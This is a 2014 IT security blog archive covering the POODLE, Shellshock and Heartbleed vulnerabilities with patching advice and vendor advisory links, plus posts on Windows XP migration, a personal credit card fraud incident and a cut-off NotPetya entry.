Thursday, 16 October 2014

SSL 3.0 POODLE Vulnerability


A vulnerability in SSL version 3.0 (SSL3.0), CVE-2014-3566, known as "POODLE" was announced on 14 October 2014. This vulnerability allows the plaintext of secure connections to be calculated by a network attacker.

SSL 3.0 is nearly 18 years old, but support for it remains widespread. Most importantly, nearly all browsers support SSL 3.0 and browsers will retry failed connections with older protocol versions, including SSL 3.0 to work around bugs in HTTPS servers. A network attacker can cause connection failures and because of this, they can trigger the use of SSL 3.0 and then exploit this issue.

Reference material can be found here:
http://googleonlinesecurity.blogspot.ie/2014/10/this-poodle-bites-exploiting-ssl-30.html

Generic advisory is that SSL 3.0 should be disabled in all affected applications, in favor of the newer encryption mechanism TLS (Transport Layer Security).


source text: www.ssh.com






Friday, 26 September 2014

Shellshock Update

The Shellshock Vulnerability ( CVE – 2014 – 6271/7169) has been rated as a 10/10 for criticality and therefore should be addressed as soon as possible.  To remedy the issue you will need to first work out which systems are affected and apply the relevant vendor patches.

Any system running a linux or linux based OS could potentially be at risk, including some versions of OS X, therefore keep in mind all appliances as well as servers and workstations when investigating your estate.
Most vendors have by now issued statements as to the current status of their products so visiting the vendor websites is always a good place to start.

Visit this site to find out more information and how to test for the vulnerability.

https://www.cert.gov.uk/resources/alerts/update-bash-vulnerability-aka-shellshock/

ShellShock - Fortinet's Response

Fortinet's Response to Shellshock vulnerability.

What is Shellshock?

Shellshock is a vulnerability discovered in the ubiquitous GNU Bourne Again Shell (Bash) program which can allow an attacker to remotely execute arbitrary code on a target system. Bash is commonly used in many Linux, Unix and Mac OS X operating systems. It also likely impacts Apple's iOS mobile operating system and Google's AndroidOS.

Who is affected?
While Bash is a local shell, it is used in many programs on the Internet to set environment variables which are then used in the execution of other programs.

How does it work?
Programs often use environment variables in their operations. If specially crafted extra code is added inside an environment variable, the operating system will execute that code. For example:

Should I be worried?
If you are the owner or maintainer of a server or other Internet infrastructure, you should patch your machines as quickly as possible. The nature of this exploit is such that it would be trivial for an attacker to compromise your machine(s) or create a self-propagating worm, reminiscent of the SQL Slammer worm in 2003, leading to potential Distributed Denial of Service attacks.

What can I do? How can I check my exposure?
On the server side of the equation, there are multiple things you should do as a best course of action to provide the highest level of security to your employees, users and customers:
It is important to note that FortiOS is not affected by Shellshock. FortiOS does not use the Bash shell.
Ensure you have appropriate IPS signatures deployed to monitor and mitigate any potential attacks on your infrastructure. Fortinet is issuing a Hot Update to our customers with IPS signatures to detect and prevent Shellshock attacks. This signature will be available in the next few hours. In situations such as this, our threat research teams are able to respond to urgent or immediate security incidents promptly to protect our customers (and our customers' customers) from exploitation.
Ensure you have deployed the latest AV DB packages to your systems and endpoints. Fortinet issued a Hot Update to our customers to detect and prevent Shellshock attacks.
Deploy the patches to affected systems as soon as possible.
What about Fortinet? How did Fortinet respond?
Fortinet released Bash.Function.Definitions.Remote.Code.Execution via Hot Update 5.552 on the afternoon of September 25th.
FortiGuard's PSIRT (Product Security and Incident Response Team) became aware of the issue on Wednesday, September 24th when the bug was publicly disclosed. Our team developed an in-house POC immediately to verify the vulnerability and started to determine the extent of our exposure in our products.
PSIRT issued a security advisory - FG-IR-14-030 on Thursday with initial information and our industry-leading security research team concurrently created initial IPS signatures to assist customers in determining if attackers attempting to exploit Shellshock were targeting their systems.
Patch development began in the morning of Thursday September 25th, and our QA teams have started testing the updates.
Many of our products, including FortiOS, were not affected by Shellshock and a patch is not required. The product security advisory lists our affected products.

http://www.fortiguard.com/advisory/FG-IR-14-030/

Text taken from Fortinet Blog as is. Tech-2 does not own this text and has not verified the content.

Friday, 11 April 2014

HeartBleed Vulnerability

It's been quite a while since a vulnerability like this has been uncovered.  There is no doubt that this is a serious one and it affects many products.  What makes this a problem is not only that it has serious consequences, but also that it isn't that hard to exploit.  Affected versions of OpenSSL have also been around for a long time since around April 2012 meaning the impact up to now is unknown.
Recommendations are to patch the affected products, renew certificates and ensure users change their passwords.

OpenSSL versions 1.0.1 - 1.0.2.  OpenSSL advise Affected users should upgrade to
OpenSSL 1.0.1g and users unable to immediately upgrade can opt to recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.  1.0.2 will be fixed in 1.0.2-beta2.

The list below are links to some of the affected products.  There are many more.

VMWare
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2076225

Fortinet
http://www.fortiguard.com/advisory/FG-IR-14-011

Juniper
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623

Cisco
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed

Watchguard
http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap

Aruba
http://www.arubanetworks.com/support/alerts/aid-040814.asc

CheckPoint
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173

RedHat
https://access.redhat.com/security/cve/CVE-2014-0160

F5
http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html

McAfee

https://kc.mcafee.com/corporate/index?page=content&id=SB10071

Symantec
http://www.symantec.com/business/support/index?page=content&id=TECH216558

Ubuntu
http://www.ubuntu.com/usn/usn-2165-1/

FreeBSD
http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc

RedHat
https://access.redhat.com/site/announcements/781953

Saturday, 1 March 2014

If you are still running Windows XP then you should migrate.

As we know, many home users and businesses are still running Windows XP as their Desktop Operating System. With support for Service Pack 3 ending in April this year (2014), the likelihood of increased malware and virus' is very high on these systems. This information should not be taken lightly, due to the very real threat which will continue to rise the older the Operating System gets. If a vulnerability is found and remains un-patched then businesses will be taking unnecessary risks. When support is discontinued there will be no patches so the security holes will remain open waiting to be exploited. Contrary to what many believe, this isn't Microsoft looking for ways to make more money. XP is three generations old if you count Vista, Windows 7 and now Windows 8. It's time to upgrade Windows or Migrate to a different OS completely.

Credit Card Fraud Warning

I received a voicemail, then text then a call to my home phone from the bank to call them. I verified the number was legit and contacted the bank. They didn't ask any questions but were able to verify my recent transactions so were genuine. However twenty minutes prior to the call someone had placed an order on Play.com for £500 using my details. Luckily for me the bank had the sense to block the transaction and contact me. I had to cancel my card. I decided to contact Play.com to tell them what had happened and after some cross referencing they could see that an order had been placed on a very recently created account using my bank details, but a different delivery address. The customer services lady was a bit shocked when she then cross referenced the delivery address to find that six other orders using other peoples details had also been placed today for delivery to that address. Unfortunately for those people it looks as if the transactions had at that point completed. Play.com were very grateful for my calling them as they could stop the deliveries and hopefully let the other card holders know. The issue here is that somehow these details had been leaked, most likely from a hack against either their own or more likely another online vendors system. I wonder how long this will take to be found. I immediately accessed all my accounts for various vendors, removed all card details and changed credentials. I know this was not a phishing attack as I never click on or use anything sent in an email. So be warned.... I now have something else to add to my list of things to follow up...

NotPetya Cyberwarfare ?

It is interesting that many are regarding this latest NotPetya attack as Cyberwarfare and not Ransomware. The main reasons for this assump...